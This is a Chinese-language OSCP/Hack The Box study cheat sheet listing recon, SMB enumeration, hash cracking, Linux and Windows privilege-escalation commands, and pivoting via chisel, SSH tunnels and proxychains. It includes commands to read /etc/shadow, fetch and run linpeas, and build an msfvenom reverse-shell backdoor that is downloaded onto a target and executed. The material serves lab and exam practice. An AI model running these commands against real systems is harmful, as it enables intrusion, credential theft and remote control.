說在前面#

• 策略(attack path) -> 方法(knowledge) -> 工具(cheat sheet)
• 線上靶機題目精選
• HTB 策略
• HTB Writeup
• OSCP CheatSheet
• 優質解題影片
• HackTricks
• 路上找到的洞請回報給 HITCON ZeroDay

2. 技術原理#

• 看到一個網站可能 Upload overwrite htaccess 取得 user 權限
• 要知道怎麼 upload，要用什麼工具？
• 如果拿到一個上鎖的 backup.zip，要知道怎麼破解密碼 -> hydra
• 遇到 AD 機器，也許可以 AS-REP Roasting / Kerberoasting，這是什麼樣的攻擊技術？什麼時候會用到？

舉個例子，Evil-winrm、xfreerdp 都是好用的工具，但你知道它們的原理是走哪個 Port 嗎，如果你根本不知道，結果目標主機根本就沒開相對應的服務跟 port，然後就在那邊亂試，就是你沒了解技術。

3. 作弊表和工具#

• 考試前應該還是要有好的筆記跟準備好工具
• 光是找指令或工具就花費很多時間
• 或是幫環境跟工具 debug 浪費時間
• 可運用筆記軟體紀錄　e.g. HackMD, Notion, …
  • Cheat Sheet
  • AD Cheat Sheet
  • Linux 提權
  • Windows 提權
  • Checklist

IMPORTANT

雖然在許多 rabbit hole 是確實可能存在的，但不管是在練習時，或是考試時，如果一個漏洞或是 Exploit 你無法成功利用，但你是有高度把握應該成功的，請不要猶豫的盡情 Revert 機器！

偵查（Recon）#

• 知道有哪些目標並制定攻擊計畫
• 外網偵查：大範圍尋找突破口，找到目標的 Initial Access
  • IP/域名掃描
  • ASN 查 IP
  • SSL 證書反查域名
  • 做 OSINT 以便爆破密碼或之後進入內網之後有妙用
• 內網偵查
• OSCP 允許的 AutoRecon

1
autorecon pwn2ooown.com -o ./autorecon
2
autorecon — nmap-append=" — min-rate=2000" — exclude-tags="top-100-udp-ports" — exclude-tags nikto — dirbuster.threads=4 — dirbuster.tool=dirsearch -vv <IP>

檢查表範例#

• 掃描 Port - Rustscan
• Subdomain 列舉 - dnsenum
• VHOST 列舉 - ffuf / gobuster
• 掃描出 subdomain 後加入到 /etc/hosts
• nikto, nslookup, dig, AutoRecon

Port Scanning#

1
rustscan -a <IP> -r 1-65535 --ulimit 5000
2
rustscan -a <IP> --ulimit 5000 -- -sC -sV    # 服務版本
3
nikto $ip
4
nslookup $ip
5
dig axfr $ip

Subdomain Enumeration#

1
dnsenum -f /usr/share/wordlists/amass/subdomains-top1mil-5000.txt 4876387.xyz
2
ffuf -c -w /usr/share/dnsrecon/dnsrecon/data/subdomains-top1mil-20000.txt -u http://{domain.name}/ -H "Host: FUZZ.{domain.name}"

VHOST Enumeration#

• 看看有沒隱藏的 subdomain

1
ffuf -u http://4876387.xyz/ -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H "Host: FUZZ.4876387.xyz" -ac
2
gobuster vhost --useragent "PENTEST" --wordlist "/usr/share/wordlists/amass/subdomains-top1mil-5000.txt" --url http://pwn2ooown.zyx
3
gobuster dns -d pwn2ooown.zyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 16

由詢問 DNS Server 可能的 subdomain 看有沒有反應 VHOST：看這台伺服器上面有沒有隱藏的 subdomain 基本上都是要找尋 target.tld 有沒有 xxx.target.tld 的隱藏服務

1
sudo apt install seclists
2
feroxbuster --url http://4876387.xyz/ -C 404 -d 1 -x html   # 指定附檔名
3
feroxbuster --url http://10.55.0.52/ -C 404 -d 1
4
feroxbuster -u http://pwn2ooown.zyx --silent                # 基本資訊
5
feroxbuster -u http://192.168.1.4 -r                        # 輸出結果再跑一次
6
feroxbuster -u http://192.168.1.4 -C 403,404                # 過濾狀態碼

SMB#

• 讓 Linux 機器也加入 Windows 機群的網路上的芳鄰
• Windows 電腦可透過網路芳鄰存取 Linux 主機的檔案
• LAN 裡面的 Windows 很簡單的就可以對 Linux 主機進行檔案存取
• SAMBA 檔案系統是基於 NetBIOS 通訊協定

1
smbclient -L 192.168.255.1
2
smbclient -L 192.168.255.1 -U guest
3
smbclient 192.168.255.1/Public -U guest
4
smbmap -H 192.168.255.1                    # 列舉共享資料夾
5
smbmap -H 192.168.255.1 -u raj -p 123

密碼爆破#

1
hashcat -m <format> hash.txt /usr/share/wordlists/rockyou.txt
2
hashcat -m 3200 -a 0 hash.txt rockyou.txt --session=sess

1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5 --session=myjob
2
john --restore=myjob

Useful Tool#

• 取得 root 或 adminstrator 的權限
• 刪除關鍵 log、關掉防毒
• Active Directory (AD)：集中管理公司帳號、電腦、群組、資源
• 枚舉弱點配置腳本
• Linux：加入 SetUID 權限後，其他用戶可以用檔案持有者身分執行檔案
• 可以用 sudo -l 查看當前身分有哪些指令可用
• Linux 提權建議腳本
• Linux Kernel Exploit Collection
• Windows 提權建議腳本
• Windows 提權枚舉腳本
• Windows Kernel Exploit Collection
• Windows 提權食譜
• TryHackMe 練習場 - Linux PrivEsc Arena
• TryHackMe 練習場 - DirtyPipe
• TryHackMe 練習場 - LWindows PrivEsc

Linux Privilege Escalation#

• 自動枚舉漏洞
• Kernel Exploit Collection

1
find / -perm -u=s -type f 2>/dev/null   # 尋找 SUID 檔案
2
find / -writable -type d 2>/dev/null    # 尋找可寫檔案
3
# 有點可疑但上面沒列出
4
strace (MALICIOUS SUID PATH) 2>&1 | grep -i -E “open|access|no such file”

1
wget http://ip:port/linpeas.sh
2
chmod +x linpeas.sh
3
./linpeas.sh | tee output.txt
4
./usr/bin/unix-privesc-check standard   # kali-builtin

1
cat /etc/pasword

1
uname -a              # 系統內核版本 -> google cve
2
cat /etc/issue        # 作業系統版本
3
cat /etc/os-release   # 特定於發布的信息
4
ps aux | grep root    # 列出系統 process

1
sudo -l            # run as root
2
cat /etc/passwd    # all users
3
cat /etc/shadow    # passwd file for users
4
cat History        # command history

1
ip a
2
ifconfig                      # 上述指令的替代
3
arp -a                        # 可到達的主機
4
ip neigh                      # 上述指令的替代
5
routel                        # 路由表
6
ss -anp                       # 活動的網路連接和監聽端口
7
cat /etc/iptables/rules.v4    # 防火牆規則

1
ls -lah /etc/cron*
2
cat /etc/crontab
3
crontab -l            # 排程任務列表

1
cat /etc/fstab   # 列出了啟動時將安裝的所有 drives
2
mount            # 列出所有已掛載的檔案系統

Windows Privilege Escalation#

• Kerbrute
• Kerberosting：AD 使用 Kerberos 協定來處理使用者驗證，此攻擊主要破解帳戶密碼
• Winpeas
• Potato Series
• 建議器

打進去後用 systeminfo 把裡面的資訊抓出來存在 txt 檔裡

1
./windows-exploit-suggester.py --database 2023-03-01-mssb.xls --systeminfo systeminfo.txt
2
./windows-exploit-suggester.py --upgrade

1
net user                    # 本地使用者
2
net user /domain            # 網段中的使用者
3
net user <name> /domain     # 列舉指定使用者

掃描可達網段及機器#

1
# port scan
2
nmap -sn 192.168.1.0/24
3
for i in `seq 1 254`; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done
4
# arp scan
5
netdiscover -r 192.168.1.0/24

Metasploit Framework#

1. 產生後門程式

• ip 填 interface ip (wg0)
• port 填彈回來的 shell 接入的 port

2. 開啟 C2 監聽器
3. 開啟本地 http server (8000)
   • python3 -m http.server
4. 去靶機的 /tmp 執行 wget ip:port:8000/backdoor
5. 加上執行權限 chmod +x ./backdoor
6. 本機可以看到收到東西了

1
# 產生後門 ELF
2
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f elf -o backdoor
3
# 開啟 C2 監聽器
4
msfconsole
5
use linux/x64/meterpreter/reverse_tcp
6
set LHOST wg0 (192.168.255.139)
7
set LPROT 8888    # 和後門的一樣
8
exploit

Reverse Shell#

• 在本地開 port，等目標反連回來的 shell
• 通常要有 public IP
• Vanilla generator
• Upgrade generator

1
nc -lvnp 8888                 # listen
2

3
# execute reverse shell payload #
4

5
rlwrap nc -lvnp 8888

C2 Framework#

• Connect & Communication
• Cobalt Strike
• Metasploit
• Powershell Empire

1
msfconsole
2
use linux/x64/meterpreter/reverse_tcp
3
set LHOST wg0
4
set LPORT 8888
5
exploit

實作#

正向：attacker 訪問 localhost:5555 可以接著訪問內網機 8000 port

1
# 外網
2
chisel client <pivot IP>:<listen port> <轉給攻擊機的port>:<target IP>:<target intranet port>
3
chisel client 10.10.11.105:6666 5555:127.0.0.1:8000
4
# 內網
5
chisel server -p 6666

反向：attacker 訪問 127.0.0.1:5555 可以接著訪問內網機 8000 port

• 攻擊機執行：chisel server --reverse --port 12345 --socks5
• 跳板機執行：chisel client <attacker ip>:12345 R:1080:socks
• 跳板機在 localhost:1080 開一個 socks proxy 的 port

1
# 探測內網服務
2
# localhost:9999 -> webserver:80
3
chisel server --reverse --port 12345 --socks5
4
chisel client <attacker ip>:12345 R:9999:<webserver ip>:80
5
# 內網機反連
6
# jump:9999 -> attacker:8888
7
# 從 webserver 打 reverse shell 到 jump:9999，在給 attacker:8888
8
chisel server --reverse --port 12345 --socks5
9
chisel client <attacker ip>:12345 0.0.0.0:9999:<attacker ip>:8888
10
# 代理模式
11
chisel server --reverse --port 12345 --socks5
12
chisel client <attacker ip>:12345 R:1080:socks

推薦網內的流量使用代理模式，但是 socket proxy 比較慢而且會掉包，因此建議不要從最外層掃描深入機器的所有 port，要使用 C2 Agent！

SSH Tunneling#

• 在兩台機器的特定 port 建立 ssh 連線
• 可穿透防火牆
• A 點上的某個 Port X 所傳送的資料轉送(forward)至 B 點上的 Port Y
• 種類：Local, Remote, Dynamic
• 角色 Client：可執行 SSH 來啟動 Port Forwarding 的任何機器 SSH Server：可以被 client 用 SSH 連進去的機器 Target Server：某台你想建立連線的機器，為了對外開放這台機器上的服務 Client/SSH Server 也可是當作 target，不一定要有 3 台機器才能 port forwarding

Local：

攻擊機執行：ssh -L 9999:webserver:80 user@10.55.0.52 -p 7788 把流量送到攻擊機 9999 port，再傳給跳板機轉到 80 port

ProxyChain#

• 先修改 /etc/proxychains.conf
• 新增內容 socks5 127.0.0.1 1080
• 先在本地 kali 啟用 SOCKS proxy（透過 SSH 到 vincent）
  • 在 localhost:1080 建立一個 SOCKS v5 代理，所有透過這個 proxy 的連線，最終都會經過 vincent 主機發出
• 使用 proxychain

1
# 先在本機打開 SOCKS proxy 到 vincent
2
ssh -D 1080 vincent@192.168.255.138
3
# 掃描該網段的 port
4
proxychains nmap -sS -p- 192.168.255.0/24
5
proxychains rustscan -a 192.168.255.0/24